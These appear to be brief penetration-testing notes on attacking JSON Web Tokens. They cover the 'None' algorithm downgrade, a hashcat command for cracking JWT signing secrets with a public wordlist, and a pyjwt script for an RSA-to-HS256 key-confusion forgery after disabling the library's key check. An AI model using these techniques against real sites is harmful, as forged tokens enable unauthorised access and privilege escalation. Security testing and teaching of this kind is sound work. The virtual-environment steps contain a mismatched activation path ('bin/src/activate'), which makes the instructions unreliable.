JWT stands for JSON Web Tokens and is a type of token that is used for authorisation/authentication to various websites and APIs.
In order to utilise it via APIs you will need to create a new header called as per below in your curl request.
Authorisation: Bearer **JWT_value**
You could utilise something like https://jwt.io to review the content of the token where you can review the content and potentially tamper the content if the website is vulnerable.
Signatures is what JWT uses to secure the token, which could be symmetric or asymmetric, but there is also the chance of downgrading the signature to an algorithm of ‘None’.
There is an alternative to have it encrypted, which are called JWEs.
hashcat -m 16500 -a 0 jwt.txt jwt.secrets.list - example of list https://raw.githubusercontent.com/wallarm/jwt-secrets/master/jwt.secrets.listSteps: create directory, start virtual env, source it, install jwt
mkdir jwt
cd jwt
python3 -m venv venv
source bin/src/activate
pip install pyjwt
touch script.py #content of script.py is below
In the case of RSA you will need to comment out the lines around 258 talking about is_ssh_key in /usr/lib/python3/dist-packages/jwt/algorithms.py
import jwt
public_key = "ADD_KEY_HERE"
payload = {
'username' : 'user',
'admin' : 0
}
access_token = jwt.encode(payload, public_key, algorithm="HS256")
print (access_token)